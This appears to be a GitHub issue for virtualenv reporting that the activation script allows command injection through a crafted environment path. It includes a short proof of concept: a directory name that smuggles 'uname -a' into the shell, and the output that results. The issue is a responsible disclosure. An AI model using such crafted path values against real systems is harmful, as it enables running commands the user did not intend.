-
-
Notifications
You must be signed in to change notification settings - Fork 1.1k
Command injection is possible via activation script #2768
Copy link
Copy link
Closed
Labels
Description
Issue
This issue was originally reported to Tidelift, with disclosure negotiated with the maintainer.
The activation script in virtualenv is command injectable via a crafted path:
envname="';uname -a;':"
mkdir "$envname"
cd "$envname"
virtualenv .
. ./bin/activateLinux archlinux 6.10.6-arch1-1 #1 SMP PREEMPT_DYNAMIC Mon, 19 Aug 2024 17:02:39
The execution path is low-risk since users clearly know what they are doing. However, it makes downstream attack vectors possible. More details on possible exploits of a famous downstream were disclosed to the maintainers of that project and virtualenv.
Environment
- OS: Linux
Reactions are currently unavailable